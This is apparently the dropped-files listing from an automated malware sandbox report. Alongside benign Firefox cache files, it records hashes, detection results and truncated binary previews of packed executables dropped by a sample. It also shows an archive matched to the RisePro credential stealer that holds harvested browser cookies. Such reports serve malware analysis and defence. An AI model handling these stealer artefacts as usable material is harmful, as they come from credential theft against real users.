                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 771817472
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11243
                                                                                                                                                                                  Entropy (8bit):6.236166493994508
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:asSj8TUN+kYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0AxkDCvDXhJ7Cr:bSjuUcHmzwTWvoglJmzwTWvogrBHJm2v
                                                                                                                                                                                  MD5:3E655B04082042DA630D787C291CA9B3
                                                                                                                                                                                  SHA1:30A7F6B78F6A5611C35BB89DF2B6BE271B1294D9
                                                                                                                                                                                  SHA-256:0AE84DDFC9C96F264AAD9252534BA6730DFF67BFFAB4394B5F5ABC2D05C8652D
                                                                                                                                                                                  SHA-512:F9F430878BDFFD9F01662BF74982E26CD751E0B79D99653DB4721164825E921A079ECA5923EEFF22E4FD82378677F013ECF191AA021DBE80BA7118A5D145B405
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8044
                                                                                                                                                                                  Entropy (8bit):6.040420210563875
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:elMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckcLUcucLc:eOWebV2GZuZrFK0k0t7qW0NbZovEpR7
                                                                                                                                                                                  MD5:2C93966D758DC586F0AB723830B90376
                                                                                                                                                                                  SHA1:6600F536CE3BDF9C2A512B84CC68AFEDA70FF505
                                                                                                                                                                                  SHA-256:60971F65D536A5F52BF839A0E2D87C7AFC147D3D18ABCFA97699B58211564A30
                                                                                                                                                                                  SHA-512:2E8FFA6E3DD9E096338141940B247C8F56C0C320ABE0C93E4775ED1C74DB01D373A059C19F5F2D34DC18D9958F1F75B155CFFBC13252BEADD1FD5D6BFDCA0BED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.../........e...e...F.A.e......z....a,~1708514998,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/newtab/1/6f7581f3-9c81-406e-b1d2-b9090ab44db1.strongly-framed.1.security-info.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
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 922812416
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11252
                                                                                                                                                                                  Entropy (8bit):6.243282877152761
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:L1McbRSj8TUNGzkYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0Axk0CvDj:LO0SjuUcHmzwTWvoglJmzwTWvogrBHJh
                                                                                                                                                                                  MD5:CB71812E04E27C0E0ABC23E254BA5CA2
                                                                                                                                                                                  SHA1:6A3AF6B08130C8BFDB0574D74065739905447CF5
                                                                                                                                                                                  SHA-256:63FB097F925E1F5BEE367EA0E1DDE4DF8BA6114B438396D9233D19F200556516
                                                                                                                                                                                  SHA-512:AB6411B5F054CAA70FF3BD3CE3C50C36DDA1D3CC8D3CF43F56570F1C6554E14E9FD3825B3B0DB136176588FA13B767B32B631B7C68C1D94292F2F6DF6B59FC8F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9760
                                                                                                                                                                                  Entropy (8bit):6.113552406447489
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:dDMwBNPcpFR8SeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdGPXdGPe:dAWOeLYGBRohB1r1uk/KiFTaIdaGX
                                                                                                                                                                                  MD5:FC1B0D54F72928B1725AD7ADBF168B8D
                                                                                                                                                                                  SHA1:76CF1D1B55A2175E6DB6A0B6757AE2771BDA8A79
                                                                                                                                                                                  SHA-256:CB17DA0F107141C21BA179F771FB776C2FB0620334481AE527D166898FC39225
                                                                                                                                                                                  SHA-512:8B230CCB7C2A7838988F6E7AF877F5D3056EF2C24561B2BD7537FFEA1943BDCB5C2F4E7C5E18DF6BD4D6F4B98C59A2B40796033723E8EDD2B6E79B3A8431F38D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"-last_modified","schema":{"type":"object","required":["name","release","revision","license"],"properties":{"id":{"type":"string"},"name":{"type":"string","title":"Name","description":"The name of the project, e.g. bergamot-translator"},"license":{"type":"string","title":"License","description":"The license of the wasm, as a https://spdx.org/licenses/"},"release":{"type":"string","title":"Release","description":"The human readable identifier for the release. e.g. v0.4.4"},"revision":{"type":"string","title":"Revision","description":"The commit hash for the project that generated the wasm."}}},"signature":{"ref":"3at5mbgf5mqwf24mrmz042ti7m","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"1Pi8xGXAsMvLuO7UKugWW97kiqikykcWXBpsk_OypNCwN1ZvMjkE_SDnmOWcPlFWPeV_H0bquFzJrzXTu-vtAHtcH6YQCktkbqDHxS6zmCN6MeiPrhPZ7uFPHv2EsFGM","signer_id
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8559
                                                                                                                                                                                  Entropy (8bit):6.096215849886045
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:QNuoeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdUtdU8:QNuoeLYGBRohB1r1uk/KiFTaIdaOf
                                                                                                                                                                                  MD5:A4202F3AE8B916989D843AE3D806989E
                                                                                                                                                                                  SHA1:FB130000DC42AE9397B3B0CC5DF195F1255194F9
                                                                                                                                                                                  SHA-256:0B61A645009DA02B5920C1886F749723B9152779788E39E01640FB72AC37E0DD
                                                                                                                                                                                  SHA-512:53485E081605AB1AFE3FBCA32F8ACD51E2F21A3DEA7F2495D69CDBEBD140460421AA000920D3CE7B994BCD76EC123C868C5AE305416C70B7FE85B56D142400F8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"project_name":"Remote Settings PROD","project_version":"18.0.0","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"batch_max_requests":25,"readonly":true,"explicit_permissions":false},"capabilities":{"changes":{"description":"Track modifications of records in Kinto and store the collection timestamps into a specific bucket and collection.","url":"http://kinto.readthedocs.io/en/latest/tutorials/synchronisation.html#polling-for-remote-changes","version":"32.0.3","collections":["/buckets/blocklists","/buckets/blocklists-preview","/buckets/main","/buckets/main-preview","/buckets/security-state","/buckets/security-state-preview"]},"attachments":{"description":"Add file attachments to records","url":"https://github.com/Kinto/kinto-attachment/","version":"6.4.0","base_url":"https://firefox-settings-attachments.cdn.mozilla.net/"}}}|..3.............e...F.A.e..[...2....:https://firefox.settin
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8054
                                                                                                                                                                                  Entropy (8bit):6.038985035887847
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:9MdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEck/LUcu/LU3:GWebV2GZuZrFK0k0t7qW0NbZovEpkA
                                                                                                                                                                                  MD5:BA35911B555EAEB7D854D3905FAC5B76
                                                                                                                                                                                  SHA1:E0334E373914FCF3C7CFA110EAEF979957B99235
                                                                                                                                                                                  SHA-256:B2DD2BCE7725193172294647FA3C671AB22BC7D5B3687828C111A1468C9A34B9
                                                                                                                                                                                  SHA-512:96B6C0D34286D500AFEFB5C24AC2C23A26A57C4775F2A6390AD682B1287C636387DD37944B6E440E2C046774A7548754389D0B849D64531A9E2CD2CC3A27BB9A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:c.!.........e...e...F.A.e...........a,~1708515000,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/5e16a81f-1e89-4191-ac33-8ab19a08b66f.strongly-framed.1.security-info.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
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 21464, version 1.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):29733
                                                                                                                                                                                  Entropy (8bit):7.848483910426049
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:kNMw20ZcZdIR049weTGXkBXju/W4irYjhPC09oOtbMDa9HVZycTvwxNTGu62MtVJ:UaxmXXSdiQPCjMvyugNiuxMtVpD0La82
                                                                                                                                                                                  MD5:41791893B5000F2113DE4EE0DA4D1CB1
                                                                                                                                                                                  SHA1:228527234877CF7FDD66D36BBF5A041D06697C28
                                                                                                                                                                                  SHA-256:9EB2CCF76817A532E58109DDFA875AF711705AF5761F327F3B6B51F8169E2588
                                                                                                                                                                                  SHA-512:1A27B51AC3470CAE817366747EA33892601E97D7B42EACDB94FB689381BB254CF9C517B257AE50FE2EE612935C6C2D8F19BA2BD566730192EB591C4E92465BC6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8047
                                                                                                                                                                                  Entropy (8bit):6.0392906116054945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:SFMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckTLUcuTLc:SuWebV2GZuZrFK0k0t7qW0NbZovEpoc
                                                                                                                                                                                  MD5:CA64A44546537CB19AD0E6411D6819E8
                                                                                                                                                                                  SHA1:6B406A6D7C861F2FB827663E2A14F3DA265ACC06
                                                                                                                                                                                  SHA-256:994B37BEE509A1545D72CFCC5F7AEF04471018A2CE6479FDD236DE9CC639D1FB
                                                                                                                                                                                  SHA-512:C192B1C9911A6904BC57088E89566BB3EBB30B7B2B1D58D60926797F43C577A84F1F70A0A3FD4509FF5B5681D7A818BACA0EF845971D6BC0E237F194819DA673
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:yWB.........e...e...F.A.e......}....a,~1708514991,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/top-sites/1/d3698c60-da91-4f8c-b7c7-e14b40be8bb1.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeBlo99E8h
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):7044
                                                                                                                                                                                  Entropy (8bit):6.030728847493467
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:1bLryG5lPXMcq0ej6FzfryG5lPXMcq0ej6FzHehQgMxFJz48t8QkciiZFPPnnq7y:trJPPXBrrJPPXBC8jjt8+RZFPPqYWM
                                                                                                                                                                                  MD5:81D587EF9CD68793A16CC101C641293E
                                                                                                                                                                                  SHA1:B7CE2A3F73C3FA578667ECC4E9169C699FCE4042
                                                                                                                                                                                  SHA-256:3BB76C24702C89281E0CAC5D6E711042E686067F1A9A99F8378504EC816EF5DE
                                                                                                                                                                                  SHA-512:1BAACB805C148F3ED4E92B81E007D64E60199F53624FD2CB5B690FBA7F9EB6D6ECB3CC00175DB1C22BA936278DC3FCD5A002C71A8B4AEB7FA1C2C71E27A4D8A8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:............e...e...F.B.e......J....O^partitionKey=%28https%2Cyoutube.com%29,:https://i.ytimg.com/generate_204.necko:classified.1.strongly-framed.1.security-info.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
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15578
                                                                                                                                                                                  Entropy (8bit):5.7650091048309795
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:YwkRd30V6h7UMQ3GEIsDTaId8WdHe8aDWdHe8at:Ywsd3s6cGEIga8/d+8aid+8at
                                                                                                                                                                                  MD5:EBE80A417074A771AB2DBB6B108F71DC
                                                                                                                                                                                  SHA1:DD0A2BEED3220DE0CA074B654D841B1B15CFBBF6
                                                                                                                                                                                  SHA-256:3CEA91A139FF1BF4E642D0BAB0AAD47E8674E877D5F21D62D8B1747B543CF868
                                                                                                                                                                                  SHA-512:B737EE101A2B6D9F67D202B301449953191F0B5FD0BC5A51135493AE5A9ECED1812068AB295550901D7D29F61C8F53DF8397C12F892194FB3F9C957B3B3A0D2A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2029892
                                                                                                                                                                                  Entropy (8bit):4.701156726468159
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:+6j+d487l/bpQoykPA1OEiCIuRhRuPoCnE2ZzNYLQhhWiqAg+XdN43Ib+M5TkRYX:AdR7l/bLs6BjUNRYRck
                                                                                                                                                                                  MD5:04F00B709D92A4DC8BF6CDDE6AC3BFAF
                                                                                                                                                                                  SHA1:E8F46721CB9E33A40C55CFA52B08371722FEAA63
                                                                                                                                                                                  SHA-256:62E09ED0E9A8136BF7FDD439BE0CC326C5FD84AA511CCE50C0D4DBB68BA37E06
                                                                                                                                                                                  SHA-512:9DE3CF0A0C752AA529A7F38E2B7FB2070B502925D9017C103C32BD117089F347E20996E2FB3B118EB1219746AACB3F4ACB66FB187B44937331EF3D881F75BB69
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozXDRcachev003......I..9.resource://gre/modules/TelemetryControllerContent.sys.mjsU.jsloader/non-syntactic/module/resource/gre/modules/TelemetryControllerContent.sys.mjs.........6.resource://gre/modules/TelemetryControllerBase.sys.mjsR.jsloader/non-syntactic/module/resource/gre/modules/TelemetryControllerBase.sys.mjs.........+.resource://gre/modules/AppConstants.sys.mjsG.jsloader/non-syntactic/module/resource/gre/modules/AppConstants.sys.mjs.&..T....".resource://gre/modules/Log.sys.mjs>.jsloader/non-syntactic/module/resource/gre/modules/Log.sys.mjs8C..Hp...).resource://gre/modules/XPCOMUtils.sys.mjsE.jsloader/non-syntactic/module/resource/gre/modules/XPCOMUtils.sys.mjs.....3...*.chrome://global/content/process-content.jsG.mm/script/resource/gre/chrome/toolkit/content/global/process-content.js@........6.resource://gre/modules/extensionProcessScriptLoader.js>.mm/script/resource/gre/modules/extensionProcessScriptLoader.js ........5.resource://gre/modules/ExtensionProcessScript.sys.mjsQ.j
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9050156
                                                                                                                                                                                  Entropy (8bit):4.734884325170652
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:CwTv3Dxd4CqeWDc+ikpXGBm5DkG0C6RAuAgdyR+FC2G1Kl/S/qyarN7h//uTl+EL:/v8cW5IBmSAVgdy0n/SSya7/Y+EKm
                                                                                                                                                                                  MD5:C1225D809B1E5A0578AED0CC34A04B99
                                                                                                                                                                                  SHA1:1C7BD973239B984986FCFB77C6FF12AF5047A7FA
                                                                                                                                                                                  SHA-256:7EC32D3BD3BA99FAB0112B0E0B9AD7EBF73BA586ED15C8291A55A446B00935ED
                                                                                                                                                                                  SHA-512:8DA6D17D4A8C500E13E3176B8B872533861501080E4903000CBB546DFD04C9A2A4AA90D4A6C7BD713B7E931B4CC3C962728256150EC209674559A22C628234F2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozXDRcachev003.......]l3.resource://gre/modules/MainProcessSingleton.sys.mjsO.jsloader/non-syntactic/module/resource/gre/modules/MainProcessSingleton.sys.mjs.........5.resource://gre/modules/CustomElementsListener.sys.mjsQ.jsloader/non-syntactic/module/resource/gre/modules/CustomElementsListener.sys.mjs....H....'.resource:///modules/BrowserGlue.sys.mjsF.jsloader/non-syntactic/module/resource/app/modules/BrowserGlue.sys.mjs.........1.resource://gre/modules/ActorManagerParent.sys.mjsM.jsloader/non-syntactic/module/resource/gre/modules/ActorManagerParent.sys.mjs.....R...'.resource://gre/modules/XULStore.sys.mjsC.jsloader/non-syntactic/module/resource/gre/modules/XULStore.sys.mjs.7..x5...1.resource://gre/modules/EnterprisePolicies.sys.mjsM.jsloader/non-syntactic/module/resource/gre/modules/EnterprisePolicies.sys.mjs.m.......7.resource://gre/modules/EnterprisePoliciesParent.sys.mjsS.jsloader/non-syntactic/module/resource/gre/modules/EnterprisePoliciesParent.sys.mjs.s..P....(.resource://gre
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2854
                                                                                                                                                                                  Entropy (8bit):4.80400446161761
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:UxwneU3deLVegWWKmWtoBYjYdYgbbYgbqhNTKWeRryLPZefSyWr9HicStpRtNm7J:UxFU3Wu38qgbkgbIKKRCUOt9Jrq
                                                                                                                                                                                  MD5:AA6DC573C53541F16F0F98644F716147
                                                                                                                                                                                  SHA1:F54D8FB14DDA22C1E997BCBFFF0BBEC87DB5677D
                                                                                                                                                                                  SHA-256:83CAC2D67AA82B33356D48BB5DA3B70D7DE6B1518640AF8E60BCD8B72922ECCB
                                                                                                                                                                                  SHA-512:A244D2B257A66B3D8725920EBD8DD1A482E4E6F7E8F31B4EE2417DD281C71C1811DC8E0D001D9AB1A9DFD9E1AAE1FAAE116C0B65D0E334BE23DF2652B0A2F4A1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozURLcachev003......p..a.C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\xulstore.json.;.C:\Program Files\Mozilla Firefox\distribution\policies.json.3.chrome/browser/content/browser/built_in_addons.json.i.C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4.%.chrome/toolkit/content/global/xul.css...res/contenteditable.css.$.chrome/toolkit/res/counterstyles.css...res/designmode.css...chrome/toolkit/res/forms.css...chrome/toolkit/res/html.css...chrome/toolkit/res/mathml.css...chrome/toolkit/res/noframes.css...chrome/toolkit/res/quirk.css.!.chrome/toolkit/res/scrollbars.css...res/svg.css...chrome/toolkit/res/ua.css.0.chrome/en-US/locale/en-US/global/intl.properties.I.chrome/en-US/locale/en-US/mozapps/downloads/unknownContentType.properties.-.chrome/en-US/locale/branding/brand.properties.=.chrome/en-US/locale/en-US/global/layout/htmlparser.properties.1.localization/en-US/toolkit/about/aboutPlugins.ft
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2328576
                                                                                                                                                                                  Entropy (8bit):7.963129291166755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:ov+pa5Mxg2VmKxuou1saUJ3iuL+y8g9Rdi8ZNaFwbdwUdUL:1pa5Mx9oKhaKdL+Lgo8ZoF0dw5L
                                                                                                                                                                                  MD5:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  SHA1:FA534E53D645F69D1C950D8FF17E11E877CA970B
                                                                                                                                                                                  SHA-256:B50BECDB79B109E85CAA4F588343FDD7E96152F4E23F40AD213A0336118BC87B
                                                                                                                                                                                  SHA-512:783CEE4A35DAB87271A126B8AE46F41E636FF9AFEB2DC5620723FED828C4C72F991127FF7B8FD1DE287CB8F63B825FE0EBEDA7585B66ACD1411B7050B2F1BDA9
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L...N@.e...............".....L.......0Z...........@..........................`Z.......#...@.................................T...h....p..h1.......................................................................................................... . .`..........................@....rsrc...h1...p......................@....idata ............................@... ..,.........................@...awogigmw.P....?..D..................@...nkfwixkm..... Z......`#.............@....taggant.0...0Z.."...f#.............@...........................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@J...........@..........................pJ.....6.....@.................................Vp..j....`........................J...............................J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...tfywulqz......0.....................@...prpgnkkw.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2759
                                                                                                                                                                                  Entropy (8bit):7.719916586119035
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:9CIaCSXZV//QWGPvcHkLymqxfH5yxHqnKufOefJ4t72DMQLzn3KJ6CAkCTOCksCE:wCYZV//Q1vcHMT4PsxHqwt4nLz3KJ5Y7
                                                                                                                                                                                  MD5:5C6A44264F0FB11A46D7803FACA70931
                                                                                                                                                                                  SHA1:11D6E9F181089D9C4BEF4A8787643A5A312EB457
                                                                                                                                                                                  SHA-256:F72F455990FA4124EFE1AE479A04FD6214530050A85376CB361C1C1AAA318476
                                                                                                                                                                                  SHA-512:E0C4AB9CD2B13446F7314E73D371D2E38C15AA2C8C982F9036416652D41D21131DAEE3B657419FBB10752D7AC0434B4B9EC647DC1F689635507CA67BF3B5CACA
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\4enxhe06Yd_3ns7WRVTEXcO.zip, Author: Joe Security
                                                                                                                                                                                  Preview:PK.........cUX................Cookies\..PK.........cUXA.`%............Cookies\Chrome_Default.txt....@.........i.&h.Cn..L...\.FA@.~..v7..O...%!es.f..../S..a...@.,ek.%.H......</<2..,...I..w......1q.f.F+PiM.=h.5..2....0....O..u_.~}Z.UM........y...Rj..4H..D...xLY@....[.d.c&......G_............j%q%....Y.|.....P...u..u..85/..Z`...-..c...^A8n...Y.3......j.G!....c.....AM@!._W.yQbs.@.....h.y.-......|J..i...r....c....M...E...GS...C....X..C.U..v.%......C,.L0,......5.=....6.....PK.........cUX`.j.L...........information.txt.X.R.F.}w..a.....v...0..]..l..B.dil.d.#.`...5..e..\..g.r.t.H.4K.h........2.y..Ot;..IT.>.Q.:SSD.".O.>.b.;C....BE......2.q...4N.=.0!...&Xv;....F..>.'I...Q...$..X*9._(.....M.Zp.....Ny..$.3"x-.*.u.....A....T>..Tqw..J/..._......Sk........E.......8..&j......]........`s1..B....DR....._.zB.kO..z..i....l.A..Q...Z.?...^,W.*.e...O..Gut..6D.KZ....].Rg..#..^.(..K..W..l......y..".i ..|...=:....*.9..^...{UM....uX.|..k>......:...d@j.n...ST(H...UYj..
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
